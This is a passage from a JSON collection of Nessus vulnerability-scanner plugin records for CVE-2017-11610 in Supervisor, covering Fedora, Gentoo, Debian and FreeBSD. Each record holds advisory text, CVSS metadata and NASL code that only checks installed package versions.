(2017-307eab89e1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-11610\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-307eab89e1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected supervisor package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"supervisor-3.3.3-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"supervisor\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:04", "description": "Security fix for CVE-2017-11610\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-08-09T00:00:00", "type": "nessus", "title": "Fedora 25 : supervisor (2017-85eb9f7a36)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:supervisor", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-85EB9F7A36.NASL", "href": "https://www.tenable.com/plugins/nessus/102275", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-85eb9f7a36.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102275);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-11610\");\n script_xref(name:\"FEDORA\", value:\"2017-85eb9f7a36\");\n\n script_name(english:\"Fedora 25 : supervisor (2017-85eb9f7a36)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-11610\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-85eb9f7a36\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected supervisor package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"supervisor-3.2.4-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"supervisor\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:47", "description": "The remote host is affected by the vulnerability described in GLSA-201709-06 (Supervisor: command injection vulnerability)\n\n A vulnerability in Supervisor was discovered in which an authenticated client could send malicious XML-RPC requests and supervidord will run them as shell commands with process privileges. In some cases, supervisord is configured with root permissions.\n Impact :\n\n A remote attacker could execute arbitrary code with the privileges of the process.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2017-09-18T00:00:00", "type": "nessus", "title": "GLSA-201709-06 : Supervisor: command injection vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:supervisor", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201709-06.NASL", "href": "https://www.tenable.com/plugins/nessus/103274", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201709-06.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103274);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-11610\");\n script_xref(name:\"GLSA\", value:\"201709-06\");\n\n script_name(english:\"GLSA-201709-06 : Supervisor: command injection vulnerability\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201709-06\n(Supervisor: command injection vulnerability)\n\n A vulnerability in Supervisor was discovered in which an authenticated\n client could send malicious XML-RPC requests and supervidord will run\n them as shell commands with process privileges. In some cases,\n supervisord is configured with root permissions.\n \nImpact :\n\n A remote attacker could execute arbitrary code with the privileges of\n the process.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201709-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Supervisor users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '=app-admin/supervisor-3.1.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/supervisor\", unaffected:make_list(\"ge 3.1.4\"), vulnerable:make_list(\"lt 3.1.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Supervisor\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:22", "description": "A vulnerability has been found in supervisor, a system for controlling process state, where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 3.0a8-1.1+deb7u2.\n\nWe recommend that you upgrade your supervisor packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-08-01T00:00:00", "type": "nessus", "title": "Debian DLA-1047-1 : supervisor security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:supervisor", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1047.NASL", "href": "https://www.tenable.com/plugins/nessus/102085", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1047-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102085);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-11610\");\n\n script_name(english:\"Debian DLA-1047-1 : supervisor security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found in supervisor, a system for controlling\nprocess state, where an authenticated client can send a malicious\nXML-RPC request to supervisord that will run arbitrary shell commands\non the server. The commands will be run as the same user as\nsupervisord.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.0a8-1.1+deb7u2.\n\nWe recommend that you upgrade your supervisor packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/07/msg00042.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/supervisor\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected supervisor package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"supervisor\", reference:\"3.0a8-1.1+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:16:50", "description": "mnaberez reports :\n\nsupervisord can be configured to run an HTTP server on a TCP socket and/or a Unix domain socket. The HTTP server is how supervisorctl communicates with supervisord. If an HTTP server has been enabled, it will always serve both HTML pages and an XML-RPC interface. A vulnerability has been found where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this may be root.\n\nThis vulnerability can only be exploited by an authenticated client or if supervisord has been configured to run an HTTP server without authentication. If authentication has not been enabled, supervisord will log a message at the critical level every time it starts.", "cvss3": {}, "published": "2017-08-16T00:00:00", "type": "nessus", "title": "FreeBSD : Supervisord -- An authenticated client can run arbitrary shell commands via malicious XML-RPC requests (c9460380-81e3-11e7-93af-005056925db4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:py27-supervisor", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_C946038081E311E793AF005056925DB4.NASL", "href": "https://www.tenable.com/plugins/nessus/102508", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102508);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-11610\");\n\n script_name(english:\"FreeBSD : Supervisord -- An authenticated client can run arbitrary shell commands via malicious XML-RPC requests (c9460380-81e3-11e7-93af-005056925db4)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"mnaberez reports :\n\nsupervisord can be configured to run an HTTP server on a TCP socket\nand/or a Unix domain socket. The HTTP server is how supervisorctl\ncommunicates with supervisord. If an HTTP server has been enabled, it\nwill always serve both HTML pages and an XML-RPC interface. A\nvulnerability has been found where an authenticated client can send a\nmalicious XML-RPC request to supervisord that will run arbitrary shell\ncommands on the server. The commands will be run as the same user as\nsupervisord. Depending on how supervisord has been configured, this\nmay be root.\n\nThis vulnerability can only be exploited by an authenticated client or\nif supervisord has been configured to run an HTTP server without\nauthentication. If authentication has not been enabled, supervisord\nwill log a message at the critical level every time it starts.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://supervisord.org/changes.html\"\n );\n # https://github.com/Supervisor/supervisor/issues/964#issuecomment-317551606\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?58123af6\"\n );\n # https://vuxml.freebsd.org/freebsd/c9460380-81e3-11e7-93af-005056925db4.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec8dcc03\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py27-supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"py27-supervisor<3.3.3,1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:48", "description": "Security fix for CVE-2017-11610\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-08-11T00:00:00", "type": "nessus", "title": "Fedora 24 : supervisor (2017-713430fb15)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:supervisor", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-713430FB15.NASL", "href": "https://www.tenable.com/plugins/nessus/102393", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-713430fb15.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102393);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-11610\");\n script_xref(name:\"FEDORA\", value:\"2017-713430fb15\");\n\n script_name(english:\"Fedora 24 : supervisor (2017-713430fb15)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-11610\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-713430fb15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected supervisor package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 